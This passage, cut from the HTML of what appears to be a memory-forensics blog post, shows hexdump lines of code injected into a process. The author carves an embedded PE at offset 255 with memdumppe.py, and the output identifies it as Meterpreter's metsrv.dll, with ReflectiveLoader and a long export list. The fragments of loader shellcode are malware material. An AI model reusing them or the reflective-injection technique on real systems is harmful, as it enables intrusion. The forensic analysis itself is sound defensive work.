#f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000090: c1c9 0d41 01c1 38e0 75f1 4c03 4c24 0845<span class="Apple-converted-space"> </span>...A..8.u.L.L$.E</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">000000a0: 39d1 75d8 5844 8b40 2449 01d0 6641 8b0c<span class="Apple-converted-space"> </span>9.u.XD.@$I..fA..</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">000000b0: 4844 8b40 1c49 01d0 418b 0488 4801 d041<span class="Apple-converted-space"> </span>HD.@.I..A...H..A</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">000000c0: 5841 585e 595a 4158 4159 415a 4883 ec20<span class="Apple-converted-space"> </span>XAX^YZAXAYAZH..<span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">000000d0: 4152 ffe0 5841 595a 488b 12e9 4bff ffff<span class="Apple-converted-space"> </span>AR..XAYZH...K...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">000000e0: 5d48 8b0e 41ba 1d9f 2635 ffd5 ff56 0870<span class="Apple-converted-space"> </span>]H..A...&5...V.p</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#f4f4f4">000000f0: 0500 0000 0000 00ff 00dc 0000 0000 00</font><font color="#04ff00">4d</font><span class="Apple-converted-space" style="color: #f4f4f4;"> </span><font color="#f4f4f4">...............M</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#f4f4f4">00000100: </font><font color="#04ff00">5a</font><font color="#f4f4f4">41 5255 4889 e548 83ec 20e8 0000 0000</font><span class="Apple-converted-space" style="color: #f4f4f4;"> </span><font color="#f4f4f4">ZARUH..H.. .....</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000110: 5b48 81c3 af1e 0000 ffd3 4881 c340 0312<span class="Apple-converted-space"> </span>[H........H..@..</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000120: 0089 3b49 89d8 6a04 5aff d000 0000 0000<span class="Apple-converted-space"> </span>..;I..j.Z.......</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000130: 0000 0000 0000 0000 0000 0000 0100 000e<span class="Apple-converted-space"> </span>................</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000140: 1fba 0e00 b409 cd21 b801 4ccd 2154 6869<span class="Apple-converted-space"> </span>.......!..L.!Thi</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000150: 7320 7072 6f67 7261 6d20 6361 6e6e 6f74<span class="Apple-converted-space"> </span>s program cannot</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">00000160: 2062 6520 7275 6e20 696e 2044 4f53 206d <span class="Apple-converted-space"> </span>be run in DOS m</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Note the presence of the MZ header at offset 0xFF. Ballenthin's </font><font face="courier">memdumppe.py</font><font face="inherit"> takes an offset to the MZ header as an argument. Above I passed 0 as that offset and </font><font face="courier">memdumppe.py</font><font face="inherit"> failed. Let's try again with the offset of 255:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2"><font color="#f4f4f4">davehull@scrutiny:~/res/malfind_dump$ memdumppe.py process.0xfffffa8005138980.0xdc0000.dmp </font><font color="#04ff00">255</font><font color="#f4f4f4"> | more</font></font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">timestamp: 2017-03-17T17:57:34+00:00</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">checksum: 0x12beb5</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">export name: metsrv.dll</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">exports:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>0) Init</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space" style="color: #f4f4f4;"> </span><font color="#f4f4f4">1) </font><font color="#04ff00">ReflectiveLoader</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>2) buffer_from_file</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>3) buffer_to_file</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>4) channel_close</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>5) channel_create</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>6) channel_create_datagram</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>7) channel_create_pool</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>8) channel_create_stream</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>9) channel_default_io_handler</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>10) channel_destroy</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>11) channel_exists</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>12) channel_find_by_id</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>13) channel_get_buffered_io_context</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>14) channel_get_class</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>15) channel_get_flags</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>16) channel_get_id</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>17) channel_get_native_io_context</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>18) channel_get_type</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>19) channel_interact</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>20) channel_is_flag</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>21) channel_is_interactive</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>22) channel_open</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>23) channel_read</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>24) channel_read_from_buffered</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>25) channel_set_buffered_io_handler</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>26) channel_set_flags</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>27) channel_set_interactive</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>28) channel_set_native_io_context</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>29) channel_set_type</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>30) channel_write</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>31) channel_write_to_buffered</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>32) channel_write_to_remote</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>33) command_deregister</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>34) command_deregister_all</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>35) command_handle</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>36) command_join_threads</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>37) command_register</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>38) command_register_all</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>39) core_update_desktop</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>40) core_update_thread_token</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>41) packet_add_completion_handler</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>42) packet_add_exception</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>43) packet_add_group</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>44) packet_add_tlv_bool</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>45) packet_add_tlv_group</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>46) packet_add_tlv_qword</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>47) packet_add_tlv_raw</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>48) packet_add_tlv_string</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>49) packet_add_tlv_uint</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>50) packet_add_tlv_wstring</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>51) packet_add_tlv_wstring_len</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>52) packet_add_tlvs</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>53) packet_call_completion_handlers</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>54) packet_create</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>55) packet_create_group</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>56) packet_create_response</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>57) packet_destroy</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>58) packet_enum_tlv</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>59) packet_get_tlv</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>60) packet_get_tlv_group_entry</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>61) packet_get_tlv_meta</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>62) packet_get_tlv_string</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; 